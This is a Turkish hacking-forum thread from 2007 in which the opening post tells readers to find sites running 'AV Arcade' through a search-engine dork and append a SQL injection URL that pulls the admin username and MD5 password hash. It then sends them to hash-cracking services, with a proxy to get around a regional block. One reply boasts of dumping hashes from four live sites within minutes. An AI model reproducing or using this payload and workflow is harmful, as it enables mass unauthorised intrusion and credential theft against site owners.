2007 Açığı BinLerce siteye girin..!

Arama Kodumuz : "Powered By AV Arcade"

bu kodu googlede veya yahoo’da aratın karşınıza çıkan sitelerin sonuna

/index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20 ava_users%20WHERE%20id=1

bu kodu ekleyince md5 hashı karşınıza gelir tabiki sitede açık varsa sonra bu md5 i şu sitelerde kırabilirsiniz

http://gdataonline.com/seekhash.php

tabi en iyi md5 kırıcı olan wilw0rm türkiye ip lerine yasaklandığı için bazı arkadaşlar milw0rm a giriş yapamıyorum diyo.bunun için öncelikle şu siteye girin...

http://www.trproxy.net/index.php?

buraya girdikten sonra ADRES GİRİN YAZAN BÖLÜME

http://www.milw0rm.com/cracker/

bunu yazın burada diğer sitelerde kıramadığınız md5 leri %70 kırarsınız
 

h@cker_baba

Katılımcı Üye
18 Ara 2007
273
9
guzel bir paylasım dogrusu ama kıramadığınız md5 leri %70 kırarsınız bu gercekten dogru bazen kırılmıyor guzel paylasım
 

mrproblem

Katılımcı Üye
25 Kas 2007
375
3
gezici
arkadaşım boşver yorum yapan yapsın. Bu açık hala mevcut ve heklenmemiş site de fazlasıyla var. Yok falan demeyin gayet güzel bulunuyor. Şurada beş dakika ayırıp buldum 4 tane site patır patır md5 ler döküldü önüme.
Sanırım "[SIZE=-1]Powered by AV Arcade v3" lerde değil de [/SIZE][SIZE=-1]"Powered by AV Arcade" lerde geçerli duruyor. v3 lerde bu açık kapatılmış galiba ya da ben denk gelmedim şu beş dakikada. Ama bulduklarımın 4ü de v3 olmayanlardı.
Teşekkürler paylaşım için
[/SIZE]
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.